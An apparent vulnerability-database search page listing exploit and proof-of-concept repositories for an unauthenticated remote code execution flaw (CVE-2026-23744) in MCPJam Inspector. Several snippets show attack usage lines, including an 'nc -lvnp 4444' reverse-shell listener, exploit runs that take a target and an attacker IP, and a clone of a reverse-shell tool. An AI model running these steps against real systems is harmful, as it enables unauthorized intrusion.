Lucene search
+L

84 matches found

Kitploit
Kitploit
added 2026/09/11 12:03 p.m.7 views

CVE-2026-23744-RCE

MCPJam Inspector v1.4.2 - RCE Exploit Vulnerability Description MCPJam Inspector contains an unauthenticated Remote Code Execution RCE vulnerability in the /api/mcp/connect endpoint. The vulnerability allows attackers to execute arbitrary commands by sending a malicious MCP server configuration...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/11 11:46 a.m.8 views

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2 A critical RCE vulnerability in MCPJam Inspector 3.Start the exploit root@kitploit: python3 CVE-2026-23744.py -u -i -p 4.For better usage I recomend to update the terminal to a fully funcional one , otherwise u wont be able to use commands like ctrl^...

9.8CVSS6.3AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/11 5:22 a.m.4 views

mcpExec

mcpExec is a tool that takes advantage of the CVE-2026-23744 to gather a reverse shell using the URL of the vulnerable MCPJam Inspector installation. Installation root@kitploit: git clone https://github.com/daemoncibsec/mcpExec.git cd mcpExec python3 -m venv venv source venv/bin/activate pip...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/10 5:19 p.m.4 views

CVE-2026-23744

CVE-2026-23744: Unauthenticated Remote Code Execution in @mcpjam/inspector DISCLAIMER: This repository and the associated scripts are intended solely for authorized security assessments, penetration testing, security research, and educational analysis. Unauthorized testing of systems without...

9.8CVSS6.3AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/10 10:21 a.m.7 views

CVE-2026-23744-PoC

Description MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution RCE vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Sinc...

9.8CVSS6.6AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/10 6:29 a.m.5 views

CVE-2026-23744-poc

CVE-2026-23744 — mcpJam Remote Code Execution RCE Exploit A Python 3 proof-of-concept exploit for CVE-2026-23744 , an arbitrary command execution vulnerability affecting mcpJam v1.4.2. This utility automates payload delivery by transparently Base64-encoding commands before transmission, helping...

9.8CVSS6.5AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/10 5:35 a.m.4 views

MCPJam-Inspector-1.4.2-Remote-Code-Execution-CVE-2026-23744

on kali linux - terminal 1 nc -lvnp 4444 on kali linux - terminal 2 python3 ./CVE-2026-23744.py -t http://TARGET.com -p 4444 -i YOUR-KALI-LINUX-IP...

9.8CVSS6.1AI score0.65845EPSS
SaveExploits41
Nuclei
Nuclei
added 2026/09/10 4:50 a.m.127 views

MCPJam Inspector - Remote Code Execution

MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution RCE vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. id:...

9.8CVSS6.5AI score0.65845EPSS
SaveExploits41References3
Kitploit
Kitploit
added 2026/09/10 1:38 a.m.15 views

CVE-2026-23744-Remote-Code-Execution-POC

CVE-2026-23744 - MCPJam inspector Remote-Code-Execution: Proof Of Concept POC MCPJam inspector 3. Run the exploit root@kitploit: python3 exploit.py...

9.8CVSS6.3AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/10 1:36 a.m.8 views

CVE-2026-23744-Lab

CVE-2026-23744 – MCPJam Inspector Docker Lab This repo is a tiny Docker lab to compare a vulnerable vs patched build of MCPJam Inspector for CVE-2026-23744. It’s meant for learning and for building a public security portfolio: quick setup, clear evidence, and screenshots. ⚠️ Ethics / scope : Only...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41References1
Kitploit
Kitploit
added 2026/09/10 1:31 a.m.6 views

exploit-CVE-2026-23744

exploit-CVE-2026-23744 MCPJam Inspector is a local-first development platform for MCP servers. In versions 1.4.2 and earlier, a RCE flaw lets attackers send crafted HTTP request that installs an MCP server and runs code remotely, because the service listens on 0.0.0.0 instead of 127.0.0.1 by...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/10 1:02 a.m.13 views

CVE-2026-23744-POC

Description This vulnerability exists because MCPJam Inspector exposes internal API endpoints intended for debugging and development. These endpoints accept user-controlled input and pass it directly to system-level process execution without proper validation or sanitization. By sending a crafted...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/10 1:00 a.m.7 views

CVE-2026-23744

CVE-2026-23744 – Proof of Concept The Python script in this PoC sends a simple HTTP request to the target host running MCPJam inspector version replace with your listening port Then, open another shell, and run the PoC: root@kitploit: cd CVE-2026-23744 python3 exploit.py References REC in MCPJam...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41References3
Kitploit
Kitploit
added 2026/09/10 12:42 a.m.3 views

mcpjam-cve-2026-23744-validator

MCPJam Inspector Authorized Security Validator A bounded proof-of-concept validator for CVE-2026-23744 affecting vulnerable MCPJam Inspector deployments. This project is an independent, non-destructive validation tool for the previously disclosed CVE-2026-23744. It is not the original vulnerabili...

9.8CVSS6.7AI score0.65845EPSS
SaveExploits41References2
Kitploit
Kitploit
added 2026/09/09 9:48 p.m.5 views

CVE-2026-23744

CVE-2026-23744 MCPJam inspector Remote-Code-Execution: Proof Of Concept POC usage: root@kitploit: python3 cve-2026-23744.py --target https:// --att-ip --att-p...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/09 8:11 p.m.9 views

CVE-2026-23744

CVE-2026-23744 Exploit to MCPJam Inspector Install libraries with: pip install -r requirements.txt - use python CVE-2026-23744 --help to info MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/09 3:18 p.m.3 views

CVE-2026-23744-POC

CVE-2026-23744 — MCPJam Inspector Unauthenticated RCE MCPJam Inspector -i -p -m...

9.8CVSS6.3AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/09 12:05 p.m.7 views

mcpjaminspector-unauth-rce

mcpjaminspector-unauth-rce CVE-2026-23744 RCE in MCPJam inspector = 1.4.2 Vulnerability details https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6 Usage root@kitploit: usage: mcpjaminspector-unauth-rce.py -h --target TARGET --command COMMAND options: -h, --help show this...

9.8CVSS6.3AI score0.65845EPSS
SaveExploits41References1
Kitploit
Kitploit
added 2026/09/09 4:31 a.m.4 views

CVE-2026-23744

CVE-2026-23744 — MCPJam Inspector Unauthenticated RCE Unauthenticated remote code execution PoC for CVE-2026-23744. MCPJam Inspector 1.4.2 and earlier expose functionality through /api/mcp/connect that can launch an attacker-controlled MCP server command without authentication. For authorized...

9.8CVSS6.3AI score0.65845EPSS
SaveExploits41
Kitploit
Kitploit
added 2026/09/09 3:20 a.m.6 views

PoC-CVE-2026-23744

PoC-CVE-2026-23744 Remote Code Execution on MCPJam Inspector Reference https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6...

9.8CVSS6.2AI score0.65845EPSS
SaveExploits41References1
Rows per page
Query Builder